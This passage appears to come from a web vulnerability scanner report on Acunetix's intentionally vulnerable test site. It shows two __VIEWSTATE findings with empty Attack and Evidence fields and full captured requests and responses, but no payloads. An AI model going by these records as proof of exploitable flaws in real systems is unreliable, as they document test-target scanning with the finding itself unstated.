href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8447&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAOr%2BwD9sIZGRksYgHrk7jggELjCqRyUAy48OMPiE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLslqTQCQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBT2ChrYKh%2FTe6P1eBXLx5xzmggI4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:40 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAOr+wD9sIZGRksYgHrk7jggELjCqRyUAy48OMPiE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLslqTQCQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBT2ChrYKh/Te6P1eBXLx5xzmggI4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:White" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8435&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCARcJCBtsIZGRkFjT8iF6DnUgTj28UTB4BbyTdLNA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWwu7tBwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfvHalVv1%2BOAhnVTuVeTl0zWe2td
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:58 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCARcJCBtsIZGRkFjT8iF6DnUgTj28UTB4BbyTdLNA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWwu7tBwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfvHalVv1+OAhnVTuVeTl0zWe2td" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:White" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" 